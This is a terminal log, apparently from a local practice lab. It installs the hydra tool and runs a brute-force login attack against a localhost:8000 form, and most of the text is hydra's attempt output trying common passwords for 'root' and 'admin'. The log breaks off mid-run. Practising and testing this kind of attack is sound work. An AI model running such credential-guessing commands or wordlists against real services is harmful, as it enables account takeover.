127.0.0.1:37598 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37624 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37608 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37638 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37654 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37682 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37670 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37678 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37690 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37696 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37712 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37724 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37726 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37736 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37742 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37746 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37750 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37756 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37768 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37774 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37788 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37800 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37818 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37810 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37824 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37834 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37844 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37848 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37858 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37872 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37884 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37894 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37908 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37916 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37920 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37926 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37930 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37944 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37988 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37960 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37974 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37996 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38000 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38008 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38018 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38022 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38028 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38054 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38040 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38056 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38066 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38072 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38080 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38096 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38112 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38172 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38142 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38126 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38158 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38188 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38192 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38214 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38204 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38216 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38218 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38222 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38236 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38238 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38244 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38256 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38260 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38272 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38284 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38296 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38306 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38316 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38326 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38356 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38350 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38340 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38360 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38372 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38382 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38390 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38402 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38416 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38418 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38430 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38432 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38444 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38452 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38456 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38470 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38478 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38494 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38506 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38510 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38516 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38532 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38544 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38548 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38556 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38554 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38574 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38578 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38558 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38588 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38604 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38618 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38628 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38668 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38654 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38638 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38670 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38682 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38694 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38698 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38714 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38718 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38724 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38728 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38732 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38738 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38760 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38752 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38754 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38766 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38788 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38772 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38778 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38804 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38832 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38816 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38842 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:38858 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:38860 - "GET /login HTTP/1.0" 405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└─$ sudo apt update       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Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling InRelease [34.0 kB]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Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 Packages [21.6 MB]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Get:3 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 Contents (deb) [54.1 MB]                                           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Get:4 http://mirrors.ustc.edu.cn/kali kali-rolling/contrib amd64 Packages [104 kB]                                               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Get:5 http://mirrors.ustc.edu.cn/kali kali-rolling/contrib amd64 Contents (deb) [184 kB]                                       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Get:6 http://mirrors.ustc.edu.cn/kali kali-rolling/non-free amd64 Packages [170 kB]                                                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Get:7 http://mirrors.ustc.edu.cn/kali kali-rolling/non-free amd64 Contents (deb) [893 kB]                                          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Fetched 77.1 MB in 1min 13s (1,062 kB/s)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1955 packages can be upgraded. Run 'apt list --upgradable' to see them.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└─$ sudo apt install hydra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libmbedcrypto16    libvidstab1.1                python3.13      python3.13-minimal  python3.13-venv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libpython3.13-dev  python3-mitmproxy-wireguard  python3.13-dev  python3.13-tk       rpcsvc-proto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hydra  libbson2-2  libmongoc2-2  libmongocrypt0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Upgrading: 4, Installing: 0, Removing: 0, Not Upgrading: 1951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Download size: 0 B / 2,200 kB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Space needed: 131 kB / 35.7 GB available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(Reading database… 444777 files and directories currently installed.)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Preparing to unpack …/libbson2-2_2.5.3-1_amd64.deb…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Unpacking libbson2-2 (2.5.3-1) over (2.2.3-1)…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Preparing to unpack …/libmongocrypt0_1.20.4-1_amd64.deb…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Unpacking libmongocrypt0:amd64 (1.20.4-1) over (1.17.0-1)…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Preparing to unpack …/libmongoc2-2_2.5.3-1_amd64.deb…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Unpacking libmongoc2-2 (2.5.3-1) over (2.2.3-1)…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Preparing to unpack …/archives/hydra_9.7-2_amd64.deb…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Unpacking hydra (9.7-2) over (9.6-3)…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Setting up libbson2-2 (2.5.3-1)…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Setting up libmongocrypt0:amd64 (1.20.4-1)…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Setting up libmongoc2-2 (2.5.3-1)…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Setting up hydra (9.7-2)…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Processing triggers for libc-bin (2.43-4)…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└─$ hydra -f -I -V -L usernames.txt -P passwords.txt -s 8000 localhost http-form-post "/login:username=^USER^&amp;password=^PASS^:F=Invalid"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Hydra v9.7 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).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Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-10-11 23:58:17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[ERROR] File for logins not found: usernames.txt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└─$ mv Downloads/passwords.txt brute-force-server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└─$ mv Downloads/usernames.txt brute-force-server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└─$ cd brute-force-server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main.py  passwords.txt  __pycache__  usernames.txt  venv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└─$ hydra -f -I -V -L usernames.txt -P passwords.txt -s 8000 localhost http-form-post "/login:username=^USER^&amp;password=^PASS^:F=Invalid"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Hydra v9.7 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).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Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-10-12 00:00:41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[DATA] max 16 tasks per 1 server, overall 16 tasks, 1717 login tries (l:17/p:101), ~108 tries per task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[DATA] attacking http-post-form://localhost:8000/login:username=^USER^&amp;password=^PASS^:F=Invalid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[ATTEMPT] target localhost - login "root" - pass "123456" - 1 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123456789" - 2 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "root" - pass "111111" - 3 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "root" - pass "password" - 4 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "root" - pass "qwerty" - 5 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "root" - pass "admin" - 6 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "root" - pass "abc123" - 7 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "root" - pass "12345678" - 8 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "root" - pass "password1" - 9 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "root" - pass "1234567" - 10 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123123" - 11 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "root" - pass "1234567890" - 12 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "root" - pass "000000" - 13 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "root" - pass "12345" - 14 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "root" - pass "iloveyou" - 15 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "root" - pass "1q2w3e4r5t" - 16 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "root" - pass "1234" - 17 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123456a" - 18 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "root" - pass "qwertyuiop" - 19 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "root" - pass "monkey" - 20 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123321" - 21 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "root" - pass "dragon" - 22 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "root" - pass "654321" - 23 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "root" - pass "666666" - 24 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123" - 25 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "root" - pass "myspace1" - 26 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "root" - pass "a123456" - 27 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "root" - pass "121212" - 28 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "root" - pass "1qaz2wsx" - 29 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123qwe" - 30 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123abc" - 31 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "root" - pass "tinkle" - 32 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "root" - pass "target123" - 33 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "root" - pass "gwerty" - 34 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "root" - pass "1g2w3e4r" - 35 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "root" - pass "gwerty123" - 36 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "root" - pass "zag12wsx" - 37 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "root" - pass "7777777" - 38 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "root" - pass "qwerty1" - 39 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "root" - pass "1q2w3e4r" - 40 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "root" - pass "987654321" - 41 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "root" - pass "222222" - 42 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "root" - pass "qwe123" - 43 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "root" - pass "qwerty123" - 44 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "root" - pass "zxcvbnm" - 45 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "root" - pass "555555" - 46 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "root" - pass "112233" - 47 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "root" - pass "fuckyou" - 48 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "root" - pass "asdfghjkl" - 49 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "root" - pass "12345a" - 50 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123123123" - 51 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "root" - pass "1q2w3e" - 52 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "root" - pass "qazwsx" - 53 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "root" - pass "computer" - 54 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "root" - pass "aaaaaa" - 55 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "root" - pass "159753" - 56 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "root" - pass "iloveyou1" - 57 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "root" - pass "fuckyou1" - 58 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "root" - pass "princess" - 59 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "root" - pass "789456123" - 60 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "root" - pass "11111111" - 61 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123654" - 62 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "root" - pass "princess1" - 63 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "root" - pass "888888" - 64 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "root" - pass "linkedin" - 65 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "root" - pass "michael" - 66 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "root" - pass "sunshine" - 67 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "root" - pass "football" - 68 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "root" - pass "11111" - 69 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "root" - pass "777777" - 70 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "root" - pass "1234qwer" - 71 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "root" - pass "999999" - 72 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "root" - pass "j38ifUbn" - 73 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "root" - pass "monkey1" - 74 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "root" - pass "football1" - 75 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "root" - pass "daniel" - 76 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "root" - pass "azerty" - 77 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "root" - pass "a12345" - 78 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "root" - pass "123456789a" - 79 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "root" - pass "789456" - 80 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "root" - pass "asdfgh" - 81 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "root" - pass "love123" - 82 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "root" - pass "abcd1234" - 83 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "root" - pass "jordan23" - 84 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "root" - pass "88888888" - 85 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "root" - pass "12345admin" - 86 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "root" - pass "5201314" - 87 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "root" - pass "12qwaszx" - 88 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "root" - pass "FQRG7CS493" - 89 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "root" - pass "ashley" - 90 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "root" - pass "asdf" - 91 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "root" - pass "asd123" - 92 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "root" - pass "superman" - 93 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "root" - pass "jessica" - 94 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "root" - pass "love" - 95 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "root" - pass "samsung" - 96 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "root" - pass "shadow" - 97 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "root" - pass "blink182" - 98 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "root" - pass "333333" - 99 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "root" - pass "michael1" - 100 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "root" - pass "babygirl1" - 101 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123456" - 102 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123456789" - 103 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "111111" - 104 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "password" - 105 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "qwerty" - 106 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "admin" - 107 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "abc123" - 108 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "12345678" - 109 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "password1" - 110 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "1234567" - 111 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123123" - 112 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "1234567890" - 113 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "000000" - 114 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "12345" - 115 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "iloveyou" - 116 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "1q2w3e4r5t" - 117 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "1234" - 118 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123456a" - 119 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "qwertyuiop" - 120 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "monkey" - 121 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123321" - 122 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "dragon" - 123 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "654321" - 124 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "666666" - 125 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123" - 126 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "myspace1" - 127 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "a123456" - 128 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "121212" - 129 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "1qaz2wsx" - 130 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123qwe" - 131 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123abc" - 132 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "tinkle" - 133 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "target123" - 134 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "gwerty" - 135 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "1g2w3e4r" - 136 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "gwerty123" - 137 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "zag12wsx" - 138 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "7777777" - 139 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "qwerty1" - 140 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "1q2w3e4r" - 141 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "987654321" - 142 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "222222" - 143 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "qwe123" - 144 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "qwerty123" - 145 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "zxcvbnm" - 146 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "555555" - 147 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "112233" - 148 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "fuckyou" - 149 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "asdfghjkl" - 150 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "12345a" - 151 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123123123" - 152 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "1q2w3e" - 153 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "qazwsx" - 154 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "computer" - 155 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "aaaaaa" - 156 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "159753" - 157 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "iloveyou1" - 158 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "fuckyou1" - 159 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "princess" - 160 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "789456123" - 161 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "11111111" - 162 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123654" - 163 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "princess1" - 164 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "888888" - 165 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "linkedin" - 166 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "michael" - 167 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "sunshine" - 168 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "football" - 169 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "11111" - 170 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "777777" - 171 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "1234qwer" - 172 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "999999" - 173 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "j38ifUbn" - 174 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "monkey1" - 175 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "football1" - 176 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "daniel" - 177 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "azerty" - 178 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "a12345" - 179 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "123456789a" - 180 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "789456" - 181 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "asdfgh" - 182 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "love123" - 183 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "abcd1234" - 184 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "jordan23" - 185 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "88888888" - 186 of 1717 [child 4] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "12345admin" - 187 of 1717 [child 5] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "5201314" - 188 of 1717 [child 10] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "12qwaszx" - 189 of 1717 [child 11] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "FQRG7CS493" - 190 of 1717 [child 6] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "ashley" - 191 of 1717 [child 9] (0/0)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[ATTEMPT] target localhost - login 